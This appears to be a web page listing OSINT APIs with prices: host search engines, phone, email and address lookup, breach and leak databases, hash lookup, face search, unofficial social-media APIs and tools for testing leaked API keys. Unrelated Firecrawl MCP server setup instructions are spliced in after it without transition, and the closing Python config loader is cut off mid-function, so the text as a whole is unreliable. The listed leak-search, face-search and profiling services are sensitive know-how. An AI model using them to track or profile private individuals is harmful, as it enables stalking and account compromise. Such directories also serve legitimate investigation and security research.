Thank you for following me! https://cybdetective.com
Name | Link | Description | Price |
---|---|---|---|
Shodan | https://developer.shodan.io | Search engine for Internet-connected hosts and devices | from $59/month |
Netlas.io | https://netlas-api.readthedocs.io/en/latest/ | Search engine for Internet-connected hosts and devices. Read more at Netlas CookBook | Partly FREE |
Fofa.so | https://fofa.so/static_pages/api_help | Search engine for Internet-connected hosts and devices | ??? |
Censys.io | https://censys.io/api | Search engine for Internet-connected hosts and devices | Partly FREE |
Hunter.how | https://hunter.how/search-api | Search engine for Internet-connected hosts and devices | Partly FREE |
Fullhunt.io | https://api-docs.fullhunt.io/#introduction | Search engine for Internet-connected hosts and devices | Partly FREE |
IPQuery.io | https://ipquery.io | API for IP information such as IP risk, geolocation data, and ASN details | FREE |
Name | Link | Description | Price |
---|---|---|---|
Social Links | https://sociallinks.io/products/sl-api | Email info lookup, phone info lookup, individual and company profiling, social media tracking, dark web monitoring and more. Code example of using this API for face search in this repo | PAID. Price per request |
Name | Link | Description | Price |
---|---|---|---|
Numverify | https://numverify.com | Global Phone Number Validation & Lookup JSON API. Supports 232 countries. | 250 requests FREE |
Twilio | https://www.twilio.com/docs/lookup/api | Provides a way to retrieve additional information about a phone number | Free or $0.01 per request (for caller lookup) |
Plivo | https://www.plivo.com/lookup/ | Determine carrier, number type, format, and country for any phone number worldwide | from $0.04 per request |
GetContact | https://github.com/kovinevmv/getcontact | Find info about a user by phone number | from $6.89 per month/100 requests |
Veriphone | https://veriphone.io/ | Phone number validation & carrier lookup | 1000 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Global Address | https://rapidapi.com/adminMelissa/api/global-address/ | Easily verify, check or lookup address | FREE |
US Street Address | https://smartystreets.com/docs/cloud/us-street-api | Validate and append data for any US postal address | FREE |
Google Maps Geocoding API | https://developers.google.com/maps/documentation/geocoding/overview | convert addresses (like "1600 Amphitheatre Parkway, Mountain View, CA") into geographic coordinates | 0.005 USD per request |
Postcoder | https://postcoder.com/address-lookup | Find address by postcode | £130/5000 requests |
Zipcodebase | https://zipcodebase.com | Lookup postal codes, calculate distances and much more | 5000 requests FREE |
Openweathermap geocoding API | https://openweathermap.org/api/geocoding-api | get geographical coordinates (lat, lon) by using name of the location (city name or area name) | 60 calls/minute 1,000,000 calls/month |
DistanceMatrix | https://distancematrix.ai/product | Calculate, evaluate and plan your routes | $1.25-$2 per 1000 elements |
Geotagging API | https://geotagging.ai/ | Predict geolocations by texts | Freemium |
Name | Link | Description | Price |
---|---|---|---|
Appruve.co | https://appruve.co | Allows you to verify the identities of individuals and businesses, and connect to financial account data across Africa | Paid |
Onfido.com | https://onfido.com | Onfido Document Verification lets your users scan a photo ID from any device, before checking it's genuine. Combined with Biometric Verification, it's a seamless way to anchor an account to the real identity of a customer. India | Paid |
Surepass.io | https://surepass.io/passport-id-verification-api/ | Passport, Photo ID and Driver License Verification in India | Paid |
Name | Link | Description | Price |
---|---|---|---|
Open corporates | https://api.opencorporates.com | Companies information | Paid, price upon request |
Linkedin company search API | https://docs.microsoft.com/en-us/linkedin/marketing/integrations/community-management/organizations/company-search?context=linkedin%2Fcompliance%2Fcontext&tabs=http | Find companies using keywords, industry, location, and other criteria | FREE |
Mattermark | https://rapidapi.com/raygorodskij/api/Mattermark/ | Get companies and investor information | free 14-day trial, from $49 per month |
Name | Link | Description | Price |
---|---|---|---|
API OSINT DS | https://github.com/davidonzo/apiosintDS | Collect info about IPv4/FQDN/URLs and file hashes in md5, sha1 or sha256 | FREE |
IPInfoDB API | https://www.ipinfodb.com/api | The API returns the location of an IP address (country, region, city, zipcode, latitude, longitude) and the associated timezone in XML, JSON or plain text format | FREE |
Domainsdb.info | https://domainsdb.info | Registered Domain Names Search | FREE |
BGPView | https://bgpview.docs.apiary.io/# | Lets consumers view all sorts of analytics data about the current state and structure of the internet | FREE |
DNSCheck | https://www.dnscheck.co/api | monitor the status of both individual DNS records and groups of related DNS records | up to 10 DNS records/FREE |
Cloudflare Trace | https://github.com/fawazahmed0/cloudflare-trace-api | Get IP Address, Timestamp, User Agent, Country Code, IATA, HTTP Version, TLS/SSL Version & More | FREE |
Host.io | https://host.io/ | Get info about domain | FREE |
Name | Link | Description | Price |
---|---|---|---|
BeVigil OSINT API | https://bevigil.com/osint-api | provides access to millions of asset footprint data points including domain intel, cloud services, API information, and third party assets extracted from millions of mobile apps being continuously uploaded and scanned by users on bevigil.com | 50 credits free/1000 credits/$50 |
Name | Link | Description | Price |
---|---|---|---|
WebScraping.AI | https://webscraping.ai/ | Web Scraping API with built-in proxies and JS rendering | FREE |
ZenRows | https://www.zenrows.com/ | Web Scraping API that bypasses anti-bot solutions while offering JS rendering and rotating proxies | FREE |
Name | Link | Description | Price |
---|---|---|---|
Whois freaks | https://whoisfreaks.com/ | well-parsed and structured domain WHOIS data for all domain names, registrars, countries and TLDs since the birth of internet | $19/5000 requests |
WhoisXMLApi | https://whois.whoisxmlapi.com | gathers a variety of domain ownership and registration data points from a comprehensive WHOIS database | 500 requests per month/FREE |
IP2Whois | https://www.ip2whois.com/developers-api | Get detailed info about a domain | 500 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Ipstack | https://ipstack.com | Detect country, region, city and zip code | FREE |
Ipgeolocation.io | https://ipgeolocation.io | provides country, city, state, province, local currency, latitude and longitude, company detail, ISP lookup, language, zip code, country calling code, time zone, current time, sunset and sunrise time, moonset and moonrise | 30 000 requests per month/FREE |
IPInfoDB | https://ipinfodb.com/api | Free Geolocation tools and APIs for country, region, city and time zone lookup by IP address | FREE |
IP API | https://ip-api.com/ | Free domain/IP geolocation info | FREE |
Name | Link | Description | Price |
---|---|---|---|
Mylnikov API | https://www.mylnikov.org | public API implementation of Wi-Fi Geo-Location database | FREE |
Wigle | https://api.wigle.net/ | get location and other information by SSID | FREE |
Name | Link | Description | Price |
---|---|---|---|
PeeringDB | https://www.peeringdb.com/apidocs/ | Database of networks, and the go-to location for interconnection data | FREE |
PacketTotal | https://packettotal.com/api.html | Analyze .pcap files | FREE |
Name | Link | Description | Price |
---|---|---|---|
Binlist.net | https://binlist.net/ | get information about bank by BIN | FREE |
FDIC Bank Data API | https://banks.data.fdic.gov/docs/ | institutions, locations and history events | FREE |
Amdoren | https://www.amdoren.com/currency-api/ | Free currency API with over 150 currencies | FREE |
VATComply.com | https://www.vatcomply.com/documentation | Exchange rates, geolocation and VAT number validation | FREE |
Alpaca | https://alpaca.markets/docs/api-documentation/api-v2/market-data/alpaca-data-api-v2/ | Realtime and historical market data on all US equities and ETFs | FREE |
Swiftcodesapi | https://swiftcodesapi.com | Verifying the validity of a bank SWIFT code or IBAN account number | $39 per month/4000 swift lookups |
IBANAPI | https://ibanapi.com | Validate IBAN number and get bank account information from it | Freemium/10$ Starter plan |
Name | Link | Description | Price |
---|---|---|---|
EVA | https://eva.pingutil.com/ | Measuring email deliverability & quality | FREE |
Mailboxlayer | https://mailboxlayer.com/ | Simple REST API measuring email deliverability & quality | 100 requests FREE, 5000 requests per month for $14.49 |
EmailCrawlr | https://emailcrawlr.com/ | Get key information about company websites. Find all email addresses associated with a domain. Get social accounts associated with an email. Verify email address deliverability. | 200 requests FREE, 5000 requests for $40 |
Voila Norbert | https://www.voilanorbert.com/api/ | Find anyone's email address and ensure your emails reach real people | from $49 per month |
Kickbox | https://open.kickbox.com/ | Email verification API | FREE |
FachaAPI | https://api.facha.dev/ | Allows checking if an email domain is a temporary email domain | FREE |
Name | Link | Description | Price |
---|---|---|---|
Genderize.io | https://genderize.io | Instantly answers the question of how likely a certain name is to be male or female and shows the popularity of the name. | 1000 names/day free |
Agify.io | https://agify.io | Predicts the age of a person given their name | 1000 names/day free |
Nationalize.io | https://nationalize.io | Predicts the nationality of a person given their name | 1000 names/day free |
Name | Link | Description | Price |
---|---|---|---|
HaveIBeenPwned | https://haveibeenpwned.com/API/v3 | Lets you list pwned accounts (email addresses and usernames) | $3.50 per month |
Psbdmp.ws | https://psbdmp.ws/api | Search in Pastebin | $9.95 per 10000 requests |
LeakPeek | https://psbdmp.ws/api | Search in leak databases | $9.99 per 4 weeks unlimited access |
BreachDirectory.com | https://breachdirectory.com/api_documentation | Search for a domain in data breach databases | FREE |
Leak-Lookup | https://leak-lookup.com/api | Search by domain, email_address, fullname, ip address, phone, password, username in leak databases | 10 requests FREE |
BreachDirectory.org | https://rapidapi.com/rohan-patra/api/breachdirectory/pricing | Search by domain, email_address, fullname, ip address, phone, password, username in leak databases (possible to view password hashes) | 50 requests per month/FREE |
Name | Link | Description | Price |
---|---|---|---|
Wayback Machine API (Memento API, CDX Server API, Wayback Availability JSON API) | https://archive.org/help/wayback_api.php | Retrieve information about Wayback capture data | FREE |
TROVE (Australian Web Archive) API | https://trove.nla.gov.au/about/create-something/using-api | Retrieve information about TROVE capture data | FREE |
Archive-it API | https://support.archive-it.org/hc/en-us/articles/115001790023-Access-Archive-It-s-Wayback-index-with-the-CDX-C-API | Retrieve information about archive-it capture data | FREE |
UK Web Archive API | https://ukwa-manage.readthedocs.io/en/latest/#api-reference | Retrieve information about UK Web Archive capture data | FREE |
Arquivo.pt API | https://github.com/arquivo/pwa-technologies/wiki/Arquivo.pt-API | Allows full-text search and access preserved web content and related metadata. It is also possible to search by URL, accessing all versions of preserved web content. API returns a JSON object. | FREE |
Library Of Congress archive API | https://www.loc.gov/apis/ | Provides structured data about Library of Congress collections | FREE |
BotsArchive | https://botsarchive.com/docs.html | JSON formatted details about Telegram Bots available in database | FREE |
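
As an illustration of how one of the archive APIs listed above can be queried, the sketch below builds a request URL for the Wayback Availability JSON API and pulls the closest snapshot out of a response. The helper names (`availability_url`, `closest_snapshot`) are invented for this example, and `SAMPLE` is a hand-written stand-in that follows the response shape described in the Internet Archive documentation; check the docs before relying on any particular field.

```python
import json
from urllib.parse import urlencode

WAYBACK_AVAILABLE = "https://archive.org/wayback/available"


def availability_url(target, timestamp=None):
    """Build the query URL; timestamp is an optional YYYYMMDD[hhmmss] string."""
    params = {"url": target}
    if timestamp:
        params["timestamp"] = timestamp
    return f"{WAYBACK_AVAILABLE}?{urlencode(params)}"


def closest_snapshot(response_text):
    """Return (snapshot_url, timestamp) for the closest capture, or None."""
    data = json.loads(response_text)
    closest = data.get("archived_snapshots", {}).get("closest")
    if not closest or not closest.get("available"):
        return None
    return closest["url"], closest["timestamp"]


# Hand-written sample (not a real capture), used instead of a live request.
SAMPLE = json.dumps({
    "archived_snapshots": {
        "closest": {
            "available": True,
            "url": "http://web.archive.org/web/20200101000000/http://example.com/",
            "timestamp": "20200101000000",
            "status": "200",
        }
    }
})

print(availability_url("example.com", "20200101"))
print(closest_snapshot(SAMPLE))
```

Sending the request itself is left out on purpose; any HTTP client can fetch the URL returned by `availability_url`.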
Name | Link | Description | Price |
---|---|---|---|
MD5 Decrypt | https://md5decrypt.net/en/Api/ | Search for decrypted hashes in the database | 1.99 EURO/day |
Name | Link | Description | Price |
---|---|---|---|
BTC.com | https://btc.com/btc/adapter?type=api-doc | Get information about addresses and transactions | FREE |
Blockchair | https://blockchair.com | Explore data stored on 17 blockchains (BTC, ETH, Cardano, Ripple etc) | $0.33 - $1 per 1000 calls |
BitcoinAbuse | https://www.bitcoinabuse.com/api-docs | Lookup bitcoin addresses that have been linked to criminal activity | FREE |
Bitcoinwhoswho | https://www.bitcoinwhoswho.com/api | Scam reports on the Bitcoin Address | FREE |
Etherscan | https://etherscan.io/apis | Ethereum explorer API | FREE |
apilayer coinlayer | https://coinlayer.com | Real-time Crypto Currency Exchange Rates | FREE |
BlockFacts | https://blockfacts.io/ | Real-time crypto data from multiple exchanges via a single unified API, and much more | FREE |
Brave NewCoin | https://bravenewcoin.com/developers | Real-time and historic crypto data from more than 200+ exchanges | FREE |
WorldCoinIndex | https://www.worldcoinindex.com/apiservice | Cryptocurrencies Prices | FREE |
WalletLabels | https://www.walletlabels.xyz/docs | Labels for 7.5 million Ethereum wallets | FREE |
Name | Link | Description | Price |
---|---|---|---|
VirusTotal | https://developers.virustotal.com/reference | Analyze files and URLs | Public API is FREE |
AbuseIPDB | https://docs.abuseipdb.com/#introduction | IP/domain/URL reputation | FREE |
AlienVault Open Threat Exchange (OTX) | https://otx.alienvault.com/api | IP/domain/URL reputation | FREE |
Phisherman | https://phisherman.gg | IP/domain/URL reputation | FREE |
URLScan.io | https://urlscan.io/about-api/ | Scan and Analyse URLs | FREE |
Web of Trust | https://support.mywot.com/hc/en-us/sections/360004477734-API- | IP/domain/URL reputation | FREE |
Threat Jammer | https://threatjammer.com/docs/introduction-threat-jammer-user-api | IP/domain/URL reputation | ??? |
Name | Link | Description | Price |
---|---|---|---|
Search4faces | https://search4faces.com/api.html | Search for people in social networks by facial image | $21 per 1000 requests |
## Face Detection
Name | Link | Description | Price |
---|---|---|---|
Face++ | https://www.faceplusplus.com/face-detection/ | Detect and locate human faces within an image, and return high-precision face bounding boxes. Face⁺⁺ also allows you to store metadata of each detected face for future use. | from 0.03 per call |
BetaFace | https://www.betafaceapi.com/wpa/ | Can scan uploaded image files or image URLs, find faces and analyze them. The API also provides verification (face comparison) and identification (face search) services, and can maintain multiple user-defined recognition databases (namespaces) | 50 images per day FREE/from 0.15 EUR per request |
## Reverse Image Search
Name | Link | Description | Price |
---|---|---|---|
Google Reverse images search API | https://github.com/SOME-1HING/google-reverse-image-api/ | This is a simple API built using Node.js and Express.js that allows you to perform Google Reverse Image Search by providing an image URL. | FREE (UNOFFICIAL) |
TinEyeAPI | https://services.tineye.com/TinEyeAPI | Verify images, Moderate user-generated content, Track images and brands, Check copyright compliance, Deploy fraud detection solutions, Identify stock photos, Confirm the uniqueness of an image | Start from $200/5000 searches |
Bing Images Search API | https://www.microsoft.com/en-us/bing/apis/bing-image-search-api | With Bing Image Search API v7, help users scour the web for images. Results include thumbnails, full image URLs, publishing website info, image metadata, and more. | 1,000 requests per month FREE |
MRISA | https://github.com/vivithemage/mrisa | MRISA (Meta Reverse Image Search API) is a RESTful API which takes an image URL, does a reverse Google image search, and returns a JSON array with the search results | FREE? (unofficial) |
PicImageSearch | https://github.com/kitUIN/PicImageSearch | Aggregator for different Reverse Image Search APIs | FREE? (unofficial) |
## AI Geolocation
Name | Link | Description | Price |
---|---|---|---|
Geospy | https://api.geospy.ai/ | Estimates the location where an uploaded photo was taken | Access by request |
Picarta | https://picarta.ai/api | Estimates the location where an uploaded photo was taken | 100 requests/day FREE |
Name | Link | Description | Price |
---|---|---|---|
Twitch | https://dev.twitch.tv/docs/v5/reference | ||
YouTube Data API | https://developers.google.com/youtube/v3 | ||
Reddit | https://www.reddit.com/dev/api/ | ||
Vkontakte | https://vk.com/dev/methods | ||
Twitter API | https://developer.twitter.com/en | ||
Linkedin API | https://docs.microsoft.com/en-us/linkedin/ | ||
All Facebook and Instagram API | https://developers.facebook.com/docs/ | ||
Whatsapp Business API | https://www.whatsapp.com/business/api | ||
Telegram and Telegram Bot API | https://core.telegram.org | ||
Weibo API | https://open.weibo.com/wiki/APIζζ‘£/en | ||
https://dev.xing.com/partners/job_integration/api_docs | |||
Viber | https://developers.viber.com/docs/api/rest-bot-api/ | ||
Discord | https://discord.com/developers/docs | ||
Odnoklassniki | https://ok.ru/apiok | ||
Blogger | https://developers.google.com/blogger/ | The Blogger APIs allows client applications to view and update Blogger content | FREE |
Disqus | https://disqus.com/api/docs/auth/ | Communicate with Disqus data | FREE |
Foursquare | https://developer.foursquare.com/ | Interact with Foursquare users and places (geolocation-based checkins, photos, tips, events, etc) | FREE |
HackerNews | https://github.com/HackerNews/API | Social news for CS and entrepreneurship | FREE |
Kakao | https://developers.kakao.com/ | Kakao Login, Share on KakaoTalk, Social Plugins and more | FREE |
Line | https://developers.line.biz/ | Line Login, Share on Line, Social Plugins and more | FREE |
TikTok | https://developers.tiktok.com/doc/login-kit-web | Fetches user info and user's video posts on TikTok platform | FREE |
Tumblr | https://www.tumblr.com/docs/en/api/v2 | Read and write Tumblr Data | FREE |
WARNING: Use with caution! Accounts may be blocked permanently for using unofficial APIs.
Name | Link | Description | Price |
---|---|---|---|
TikTok | https://github.com/davidteather/TikTok-Api | The Unofficial TikTok API Wrapper In Python | FREE |
Google Trends | https://github.com/suryasev/unofficial-google-trends-api | Unofficial Google Trends API | FREE |
YouTube Music | https://github.com/sigma67/ytmusicapi | Unofficial API for YouTube Music | FREE |
Duolingo | https://github.com/KartikTalwar/Duolingo | Duolingo unofficial API (can gather info about users) | FREE |
Steam | https://github.com/smiley/steamapi | An unofficial object-oriented Python library for accessing the Steam Web API. | FREE |
Instagram | https://github.com/ping/instagram_private_api | Instagram Private API | FREE |
Discord | https://github.com/discordjs/discord.js | JavaScript library for interacting with the Discord API | FREE |
Zhihu | https://github.com/syaning/zhihu-api | Unofficial API for Zhihu | FREE |
Quora | https://github.com/csu/quora-api | Unofficial API for Quora | FREE |
DNSDumpster | https://github.com/PaulSec/API-dnsdumpster.com | (Unofficial) Python API for DNSDumpster | FREE |
PornHub | https://github.com/sskender/pornhub-api | Unofficial API for PornHub in Python | FREE |
Skype | https://github.com/ShyykoSerhiy/skyweb | Unofficial Skype API for nodejs via 'Skype (HTTP)' protocol. | FREE |
Google Search | https://github.com/aviaryan/python-gsearch | Google Search unofficial API for Python with no external dependencies | FREE |
Airbnb | https://github.com/nderkach/airbnb-python | Python wrapper around the Airbnb API (unofficial) | FREE |
Medium | https://github.com/enginebai/PyMedium | Unofficial Medium Python Flask API and SDK | FREE |
Facebook | https://github.com/davidyen1124/Facebot | Powerful unofficial Facebook API | FREE |
LinkedIn | https://github.com/tomquirk/linkedin-api | Unofficial Linkedin API for Python | FREE |
Y2mate | https://github.com/Simatwa/y2mate-api | Unofficial Y2mate API for Python | FREE |
Livescore | https://github.com/Simatwa/livescore-api | Unofficial Livescore API for Python | FREE |
Name | Link | Description | Price |
---|---|---|---|
Google Custom Search JSON API | https://developers.google.com/custom-search/v1/overview | Search in Google | 100 requests FREE |
Serpstack | https://serpstack.com/ | Google search results to JSON | FREE |
Serpapi | https://serpapi.com | Google, Baidu, Yandex, Yahoo, DuckDuckGo, Bing and many other search engines' results | $50/5000 searches/month |
Bing Web Search API | https://www.microsoft.com/en-us/bing/apis/bing-web-search-api | Search in Bing (+instant answers and location) | 1000 transactions per month FREE |
WolframAlpha API | https://products.wolframalpha.com/api/pricing/ | Short answers, conversations, calculators and many more | from $25 per 1000 queries |
DuckDuckgo Instant Answers API | https://duckduckgo.com/api | An API for some of our Instant Answers, not for full search results. | FREE |
Memex Marginalia | https://memex.marginalia.nu/projects/edge/api.gmi | An API for a new privacy-focused search engine | FREE |
Name | Link | Description | Price |
---|---|---|---|
MediaStack | https://mediastack.com/ | News articles search results in JSON | 500 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Darksearch.io | https://darksearch.io/apidoc | search by websites in .onion zone | FREE |
Onion Lookup | https://onion.ail-project.org/ | onion-lookup is a service for checking the existence of Tor hidden services and retrieving their associated metadata. onion-lookup relies on an private AIL instance to obtain the metadata | FREE |
Name | Link | Description | Price |
---|---|---|---|
Jackett | https://github.com/Jackett/Jackett | API for automating searches across different torrent trackers | FREE |
Torrents API PY | https://github.com/Jackett/Jackett | Unofficial API for 1337x, Piratebay, Nyaasi, Torlock, Torrent Galaxy, Zooqle, Kickass, Bitsearch, MagnetDL,Libgen, YTS, Limetorrent, TorrentFunk, Glodls, Torre | FREE |
Torrent Search API | https://github.com/Jackett/Jackett | API for Torrent Search Engine with Extratorrents, Piratebay, and ISOhunt | 500 queries/day FREE |
Torrent search api | https://github.com/JimmyLaurent/torrent-search-api | Yet another node torrent scraper (supports iptorrents, torrentleech, torrent9, torrentz2, 1337x, thepiratebay, Yggtorrent, TorrentProject, Eztv, Yts, LimeTorrents) | FREE |
Torrentinim | https://github.com/sergiotapia/torrentinim | Very low memory-footprint, self hosted API-only torrent search engine. Sonarr + Radarr Compatible, native support for Linux, Mac and Windows. | FREE |
Name | Link | Description | Price |
---|---|---|---|
National Vulnerability Database CVE Search API | https://nvd.nist.gov/developers/vulnerabilities | Get basic information about CVE and CVE history | FREE |
OpenCVE API | https://docs.opencve.io/api/cve/ | Get basic information about CVE | FREE |
CVEDetails API | https://www.cvedetails.com/documentation/apis | Get basic information about CVE | partly FREE (?) |
CVESearch API | https://docs.cvesearch.com/ | Get basic information about CVE | by request |
KEVin API | https://kevin.gtfkd.com/ | API for accessing CISA's Known Exploited Vulnerabilities Catalog (KEV) and CVE Data | FREE |
Vulners.com API | https://vulners.com | Get basic information about CVE | FREE for personal use |
Name | Link | Description | Price |
---|---|---|---|
Aviation Stack | https://aviationstack.com | Get information about flights, aircraft and airlines | FREE |
OpenSky Network | https://opensky-network.org/apidoc/index.html | Free real-time ADS-B aviation data | FREE |
AviationAPI | https://docs.aviationapi.com/ | FAA Aeronautical Charts and Publications, Airport Information, and Airport Weather | FREE |
FachaAPI | https://api.facha.dev | Aircraft details and live positioning API | FREE |
Name | Link | Description | Price |
---|---|---|---|
Windy Webcams API | https://api.windy.com/webcams/docs | Get a list of available webcams for a country, city or geographical coordinates | FREE with limits or 9990 euro without limits |
## Regex
Name | Link | Description | Price |
---|---|---|---|
Autoregex | https://autoregex.notion.site/AutoRegex-API-Documentation-97256bad2c114a6db0c5822860214d3a | Convert English phrase to regular expression | from $3.49/month |
Name | Link |
---|---|
API Guessr (detect API by auth key or by token) | https://api-guesser.netlify.app/ |
REQBIN Online REST & SOAP API Testing Tool | https://reqbin.com |
ExtendsClass Online REST Client | https://extendsclass.com/rest-client-online.html |
Codebeautify.org Online API Test | https://codebeautify.org/api-test |
SyncWith Google Sheet add-on. Link more than 1000 APIs with Spreadsheet | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
Talend API Tester Google Chrome Extension | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
Michael Bazzell API search tools | https://inteltechniques.com/tools/API.html |
Name | Link |
---|---|
Convert curl commands to Python, JavaScript, PHP, R, Go, C#, Ruby, Rust, Elixir, Java, MATLAB, Dart, CFML, Ansible URI or JSON | https://curlconverter.com |
Curl-to-PHP. Instantly convert curl commands to PHP code | https://incarnate.github.io/curl-to-php/ |
Curl to PHP online (Codebeautify) | https://codebeautify.org/curl-to-php-online |
Curl to JavaScript fetch | https://kigiri.github.io/fetch/ |
Curl to JavaScript fetch (Scrapingbee) | https://www.scrapingbee.com/curl-converter/javascript-fetch/ |
Curl to C# converter | https://curl.olsh.me |
Name | Link |
---|---|
Sheety. Create an API from a Google Sheet | https://sheety.co/ |
Postman. Platform for creating your own API | https://www.postman.com |
Retool. REST API Generator | https://retool.com/api-generator/ |
Beeceptor. Rest API mocking and intercepting in seconds (no coding). | https://beeceptor.com |
Name | Link |
---|---|
RapidAPI. Market your API for millions of developers | https://rapidapi.com/solution/api-provider/ |
Apilayer. API Marketplace | https://apilayer.com |
Name | Link | Description |
---|---|---|
Keyhacks | https://github.com/streaak/keyhacks | Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. |
All about APIKey | https://github.com/daffainfo/all-about-apikey | Detailed information about API key / OAuth token for different services (Description, Request, Response, Regex, Example) |
API Guessr | https://api-guesser.netlify.app/ | Enter an API key and find out which service it belongs to |
Name | Link | Description |
---|---|---|
APIDOG ApiHub | https://apidog.com/apihub/ | |
Rapid APIs collection | https://rapidapi.com/collections | |
API Ninjas | https://api-ninjas.com/api | |
APIs Guru | https://apis.guru/ | |
APIs List | https://apislist.com/ | |
API Context Directory | https://apicontext.com/api-directory/ | |
Any API | https://any-api.com/ | |
Public APIs Github repo | https://github.com/public-apis/public-apis |
If you don't know how to work with REST APIs, I recommend you check out the Netlas API guide I wrote for Netlas.io.
It explains briefly and accessibly how to automate requests in different programming languages (with a focus on Python and Bash) and how to process the resulting JSON data.
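
For readers who want a starting point before opening that guide, here is a minimal Python sketch of the usual workflow: build a query URL, fetch the JSON, and pick out the fields you care about. It is not taken from the Netlas guide. The function names (`build_url`, `fetch_json`, `pick`), the endpoint in the usage note, and the sample record are all hypothetical, and real services differ in how they expect authentication to be passed.

```python
import json
import urllib.request
from urllib.parse import urlencode


def build_url(base, params):
    """Append URL-encoded query parameters to a base endpoint."""
    return f"{base}?{urlencode(params)}"


def fetch_json(url, headers=None, timeout=10):
    """GET a URL and decode the JSON body (performs a real network request)."""
    request = urllib.request.Request(url, headers=headers or {})
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return json.loads(response.read().decode("utf-8"))


def pick(record, *paths):
    """Pull dotted paths such as 'location.city' out of nested JSON.

    Missing keys yield None instead of raising, which is handy when
    different records carry different fields.
    """
    result = {}
    for path in paths:
        value = record
        for key in path.split("."):
            value = value.get(key) if isinstance(value, dict) else None
        result[path] = value
    return result


# Hypothetical response body standing in for whatever a real API returns.
sample = json.loads(
    '{"ip": "203.0.113.7", "location": {"city": "Berlin", "country": "DE"}}'
)
print(pick(sample, "ip", "location.city", "isp.name"))
```

With a real service, usage would look like `fetch_json(build_url("https://api.example.com/v1/search", {"q": "port:22"}), headers={"X-API-Key": "..."})`; the header name is an assumption and varies per provider.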
A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.
Big thanks to @vrknetha, @cawstudios for the initial implementation!
You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.
env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp
npm install -g firecrawl-mcp
Configuring Cursor 🖥️
Note: Requires Cursor version 0.45.6+. For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide
To configure Firecrawl MCP in Cursor v0.45.6
env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp
To configure Firecrawl MCP in Cursor v0.48.6
{
  "mcpServers": {
    "firecrawl-mcp": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR-API-KEY"
      }
    }
  }
}
If you are using Windows and are running into issues, try
cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"
Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys
After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.
Add this to your ./codeium/windsurf/model_config.json:
{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY"
      }
    }
  }
}
To install Firecrawl for Claude Desktop automatically via Smithery:
npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude
- FIRECRAWL_API_KEY: Your Firecrawl API key
- FIRECRAWL_API_URL (Optional): Custom API endpoint for self-hosted instances, for example https://firecrawl.your-domain.com
- FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
- FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
- FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
- FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)
- FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
- FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

For cloud API usage with custom retry and credit monitoring:
# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key
# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff
# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits
For self-hosted instance:
# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com
# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth
# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries
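
To show how these variables and their documented defaults fit together, here is a small Python sketch of a loader that reads them from the environment. It is an illustration only, not the server's actual code (which is a Node package). The function name `load_config` is hypothetical, and the rule that at least one of the key or the URL must be set is an assumption drawn from the "Required for cloud API" and "Required for self-hosted" comments above.

```python
import os

# Numeric settings with the defaults documented above.
DEFAULTS = {
    "FIRECRAWL_RETRY_MAX_ATTEMPTS": 3,
    "FIRECRAWL_RETRY_INITIAL_DELAY": 1000,   # milliseconds
    "FIRECRAWL_RETRY_MAX_DELAY": 10000,      # milliseconds
    "FIRECRAWL_RETRY_BACKOFF_FACTOR": 2,
    "FIRECRAWL_CREDIT_WARNING_THRESHOLD": 1000,
    "FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": 100,
}


def load_config(env=None):
    """Read Firecrawl settings from a mapping (defaults to os.environ)."""
    env = os.environ if env is None else env
    # Environment values arrive as strings, so convert them to integers.
    config = {name: int(env.get(name, default)) for name, default in DEFAULTS.items()}
    config["FIRECRAWL_API_KEY"] = env.get("FIRECRAWL_API_KEY")
    config["FIRECRAWL_API_URL"] = env.get("FIRECRAWL_API_URL")
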